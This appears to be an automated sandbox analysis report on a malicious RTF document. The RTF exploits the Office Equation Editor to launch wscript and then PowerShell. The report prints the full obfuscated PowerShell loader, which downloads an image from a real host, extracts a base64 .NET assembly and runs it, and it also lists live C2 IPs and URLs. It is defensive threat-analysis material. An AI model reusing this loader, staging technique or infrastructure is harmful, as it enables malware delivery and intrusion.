Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 780			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2344			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1812	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 3180	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3304	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3308	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3280	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3424	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to read the PEB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_035106C2 mov edx, dword ptr fs:[00000030h]

2_2_035106C2

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 91.92.254.29 80

Jump to behavior

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 3200, type: MEMORYSTR

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS"			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"			Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command ". ( $verbosepreference.tostring()[1,3]+'x'-join'')( (('94ylink = ykohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235yko; 94ywebclient = new-object system.net.webclie'+'nt; try { 94ydownloadeddata = 94ywebclient.downloaddata(94ylink) } catch { write-host ykofailed to download data from 94ylinkyko -foregroundcolor red; ex'+'it }; if (94ydownloadeddata -ne 94ynull) { 94'+'yimagetext = ['+'system.text.encoding]::utf8.getstring(94ydownload'+'eddata); 94ystartflag = yko<<base64_start>>yko;'+' 94yendflag '+'= yko<<base64_end>>yko; 94ystartindex = 94yimagetext.indexof(94ystartflag); 94yendindex = 94yimagetext.indexof(94yendflag); if (94ystartindex -ge 0 -and 94yen'+'dindex -gt 94ystartind'+'ex) { 94ystartindex += 94ystartflag.length; 94ybase64length = 94yendindex - 94ystartindex; 94ybase64command = 94yimagetext.substring(94yst'+'a'+'rtindex, 94ybase64length); 94ycommand'+'bytes = [sy'+'st'+'em.convert]::fro'+'mbase64string(94ybase64command); 94yloadedassembly = [system.reflection'+'.assembly]::load(94ycommandbytes); 94ytype = 9'+'4yloadedassembly.gettype(ykorunpe.homeyko); 94ymethod = 94ytype.getmethod(ykovaiyko).invoke('+'94ynull, ['+'object[]] (ykotxt.fdw/11033/61.532.59.32//:ptthyko ,'+' ykodesativadoyko , ykodesativadoyko , ykodesati'+'vadoyko,ykoregasmyko,ykoyko)) } }') -creplace 'yko',[char]39 -creplace([char]57+[char]52+[char]89),[char]36) )"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command ". ( $verbosepreference.tostring()[1,3]+'x'-join'')( (('94ylink = ykohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235yko; 94ywebclient = new-object system.net.webclie'+'nt; try { 94ydownloadeddata = 94ywebclient.downloaddata(94ylink) } catch { write-host ykofailed to download data from 94ylinkyko -foregroundcolor red; ex'+'it }; if (94ydownloadeddata -ne 94ynull) { 94'+'yimagetext = ['+'system.text.encoding]::utf8.getstring(94ydownload'+'eddata); 94ystartflag = yko<<base64_start>>yko;'+' 94yendflag '+'= yko<<base64_end>>yko; 94ystartindex = 94yimagetext.indexof(94ystartflag); 94yendindex = 94yimagetext.indexof(94yendflag); if (94ystartindex -ge 0 -and 94yen'+'dindex -gt 94ystartind'+'ex) { 94ystartindex += 94ystartflag.length; 94ybase64length = 94yendindex - 94ystartindex; 94ybase64command = 94yimagetext.substring(94yst'+'a'+'rtindex, 94ybase64length); 94ycommand'+'bytes = [sy'+'st'+'em.convert]::fro'+'mbase64string(94ybase64command); 94yloadedassembly = [system.reflection'+'.assembly]::load(94ycommandbytes); 94ytype = 9'+'4yloadedassembly.gettype(ykorunpe.homeyko); 94ymethod = 94ytype.getmethod(ykovaiyko).invoke('+'94ynull, ['+'object[]] (ykotxt.fdw/11033/61.532.59.32//:ptthyko ,'+' ykodesativadoyko , ykodesativadoyko , ykodesati'+'vadoyko,ykoregasmyko,ykoyko)) } }') -creplace 'yko',[char]39 -creplace([char]57+[char]52+[char]89),[char]36) )"			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.92.254.29	unknown	Bulgaria	34368	THEZONEBG	true
23.95.235.16	unknown	United States	36352	AS-COLOCROSSINGUS	true
188.114.96.3	uploaddeimagens.com.br	European Union	13335	CLOUDFLARENETUS	true

Contacted Domains

Name	IP	Active
uploaddeimagens.com.br	188.114.96.3	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://23.95.235.16/33011/greatideaforfollowers.gif	true	Avira URL Cloud: safe	unknown
https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235	true	5%, Virustotal, Browse Avira URL Cloud: safe	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 4YlwTsmpuZ.rtf

Avira: detected

Multi AV Scanner detection for domain / URL

Source: uploaddeimagens.com.br	Virustotal: Detection: 5%	Perma Link
Source: https://uploaddeimagens.com.br	Virustotal: Detection: 6%	Perma Link
Source: http://uploaddeimagens.com.br	Virustotal: Detection: 5%	Perma Link
Source: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235	Virustotal: Detection: 5%	Perma Link

Multi AV Scanner detection for submitted file

Source: 4YlwTsmpuZ.rtf	Virustotal: Detection: 52%			Perma Link
Source: 4YlwTsmpuZ.rtf	ReversingLabs: Detection: 50%

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 23.95.235.16 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe			Jump to behavior

Office Equation Editor has been started

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035105D5 LoadLibraryW,	2_2_035105D5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03510696 ShellExecuteW,ExitProcess,	2_2_03510696
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03510668 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_03510668
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03510681 ShellExecuteW,ExitProcess,	2_2_03510681
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0351050A ExitProcess,	2_2_0351050A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035106BB ExitProcess,	2_2_035106BB

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: uploaddeimagens.com.br

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 91.92.254.29:80 -> 192.168.2.22:49162

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 91.92.254.29:80 -> 192.168.2.22:49162

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

